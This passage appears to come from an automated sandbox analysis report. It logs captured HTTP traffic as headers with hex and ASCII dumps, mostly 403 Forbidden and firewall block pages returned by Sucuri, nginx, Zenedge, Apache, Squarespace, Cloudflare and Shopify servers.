74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 34 63 62 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 61 63 63 65 73 73 2d 64 65 6e 69 65 64 20 63 6c 65 61 72 66 69 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 20 63 65 6e 74 65 72 20 77 69 64 74 68 2d 6d 61 78 2d 39 34 30 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 62 72 61 6e 64 2d 6
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:48 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingServer: namecheap-nginxData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 05 Jul 2023 06:07:48 GMTContent-Type: text/html;charset=utf8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingSet-Cookie: 4b91bab64185417e705f062d95a43eef=ae2a84ae22dee3e7ff423bd6ddfd485d;Cache-Control: no-cacheData Raw: 38 65 0d 0a 3c 68 74 6d 6c 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 3c 74 69 74 6c 65 3e e6 a3 80 e6 b5 8b e4 b8 ad 3c 2f 74 69 74 6c 65 3e 3c 64 69 76 3e e8 b7 b3 e8 bd ac e4 b8 ad 3c 2f 64 69 76 3e 3c 2f 68 74 6d 6c 3e 0a 3c 73 63 72 69 70 74 3e 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 22 2f 3f 62 74 77 61 66 3d 38 35 33 34 31 32 38 22 3b 20 3c 2f 73 63 72 69 70 74 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 8e<html><meta charset="utf-8" /><title></title><div></div></html><script> window.location.href ="/?btwaf=8534128"; </script>0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Cache-Status: Cache-Control: no-storeCache-Control: no-cache, no-store, must-revalidateCache-Control: max-age=0X-Zen-Fury: a424fc948cd41ededa37409f6d3decbe3cf1deccDate: Wed, 05 Jul 2023 06:07:49 GMTServer: ZENEDGEData Raw: 32 61 61 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 20 69 66 20 28 74 79 70 65 6f 66 28 5f 5f 5f 7a 65 6e 29 20 3d 3d 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 29 20 7b 73 65 74 54 69 6d 65 6f 75 74 28 61 72 67 75 6d 65 6e 74 73 2e 63 61 6c 6c 65 65 2c 20 35 30 29 3b 20 72 65 74 75 72 6e 3b 20 7d 5f 5f 5f 7a 65 6e 2e 68 69 63 28 22 5f 5f 5a 45 48 49 43 36 31 38 33 22 2c 20 31 36 38 38 35 33 37 32 31 39 2c 20 31 2c 20 30 2c 20 36 30 29 3b 20 7d 29 28 29 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 68 69 63 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 64 69 76 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 66 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 76 61 72 20 76 20 3d 20 31 36 38 38 35 33 37 31 35 38 20 2a 20 33 2e 31 34 31 35 39 32 36 35 33 35 38 39 38 3b 20 76 20 3d 20 4d 61 74 68 2e 66 6c 6f 6f 72 28 76 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 22 5f 5f 7a 6a 63 37 31 33 39 3d 22 2b 76 2b 22 3b 20 65 78 70 69 72 65 73 3d 57 65 64 2c 20 30 35 20 4a 75 6c 20 32 30 32 33 20 30 36 3a 30 39 3a 34 39 20 55 54 43 3b 20 70 61 74 68 3d 2f 22 3b 20 7d 29 28 29 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 2aa<html><head><title>403 Forbidden</title><script type="text/javascript">(function(){ if (typeof(___zen) === "undefined") {setTimeout(arguments.callee, 50); return; }___zen.hic("__ZEHIC6183", 1688537219, 1, 0, 60); })()</script><script type="text/javascript" async="async" src="/__zenedge/assets/hic.js?v=1674207422"></script></head><body><center><div><h1>403</h1></div><h1>Forbidden</h1></center><script type="text/javascript" async="async" src="/__zenedge/assets/f.js?v=1674207422"></script><script>(function () { var v = 1688537158 * 3.1415926535898; v = Math.floor(v); do
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:49 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveAccept-Ranges: bytesContent-Length: 904Keep-Alive: timeout=5, max=100Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 3e 20 20 20 0a 09 09 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 0a 09 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 09 09 64 69 76 2c 20 69 6d 67 7b 20 62 65 68 61 76 69 6f 72 3a 75 72 6c 28 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 73 63 72 69 70 74 73 2f 69 65 70 6e 67 66 69 78 2e 68 74 63 29 20 7d 0a 09 09 09 3c 2f 73 74 79 6c 65 3e 0a 09 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 62 6f 78 22 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 6f 62 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 72 61 64 22 3e 26 6e 62 73 70 3b 3c 2f 73 70 61 6e 3e 20 20 0a 09 09 09 09 09 3c 68 31 3e 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 68 31 3e 20 20 20 20 20 20 20 20 20 20 20 0a 09 09 09 09 09 3c 70 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 62 72 20 2f 3e 0a 09 09 09 09 09 53 69 65 20 76 65 72 66 c3 bc 67 65 6e 20 6e 69 63 68 74 20 c3 bc 62 65 72 20 64 69 65 20 6e 6f 74 77 65 6e 64 69 67 65 6e 20 52 65 63 68 74 65 2c 20 64 69 65 20 61 6e 67 65 66 6f 72 64 65 72 74 65 20 53 65 69 74 65 20 7a 75 20 62 65 74 72 65 74 65 6e 2e 3c 62 72 20 2f 3e 0a 09 09 09 09 09 42 69 74 74 65 20 77 65 6e 64 65 6e 20 53 69 65 20 73 69 63 68 20 61 6e 20 64 65 6e 20 57 65 62 6d 61 73 74 65 72 2e 3c 2f 70 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 75 6e 74 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"><htm
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:49 GMTServer: Apache/2.4Content-Length: 318Keep-Alive: timeout=5, max=300Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenAge: 0Cache-Control: no-cacheContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Wed, 05 Jul 2023 06:07:49 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceSet-Cookie: crumb=BbkDAdtRs5XINjlmOTMzZGI4YmUzMWEwZjQ3NjEzNzhmYzRlMTg5;Path=/X-Contextid: LYmPaaGl/RvdOJxOvData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:49 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCache-Control: max-age=15Expires: Wed, 05 Jul 2023 06:08:04 GMTX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RsfDyoKLuPGeU3EUTiuyXNQ8Uhq7T3cGIAeSRRFItl%2BCU6bYTkKjAMmzwaPyhCRWsUkKSI4jQzqvGEMrDxkQQ%2FhPSND0HmNdKUICFKfTHqVbnKozd61HlAzb3XC4"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7e1d6e0e4dee3a64-FRAalt-svc: h3=":443"; ma=86400Data Raw: 31 31 39 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d Data Ascii: 119e<!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta h
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Jul 2023 06:07:49 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 216X-Sorting-Hat-ShopId: 66042101977Server-Timing: processing;dur=14X-Shopify-Stage: canaryX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-central1,gcp-us-central1X-Request-ID: b623e06b-5625-428b-b3f5-4dc72930c51cCF-Cache-Status: DYNAMICSet-Cookie: __cf_bm=.bQw5DSDgqez5XJYBb6HMjhwBfr2dlpQzNDK2xjtrWM-1688537269-0-Ae2yDUIvs9fjujRJwbCjIeLjMjf9mvUfuEvYaPijbKQ0PCChsTRtDxIzlUf7I867Y3S4dfx/11fXaQtrw2ACwIc=; path=/; expires=Wed, 05-Jul-23 06:37:49 GMT; domain=.www.domon.com; HttpOnly; SameSite=NoneReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PLbzMdrJ5gH6lV15SVtqffsG5B8%2Bfo1hpknmV7JJNGpn%2FUMjpE4EfJjqbJc9p2%2FS3tQMApceBWEnZfyhJ6aeKo2XkaVGejV%2BBuajnrknNsGbBvclr1B0Jfu%2F8GZITvA%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=157.999992Server: cloudflareCF-RAY: 7e1d6e0d7d881e6a-FRAalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:49 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7oe3cBw41lelSTPBQ6HSUjqtmr7np3NYajRwRVIaCs%2BN2q31eUCjJzAvDQWOyqlqXUy41Wm1NAbi3UXUW4sJc6la1JR4hfHwFpXdHZXeV93baGFU5XDc%2FXosTFbgx1YO"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7e1d6e0f1ec23834-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
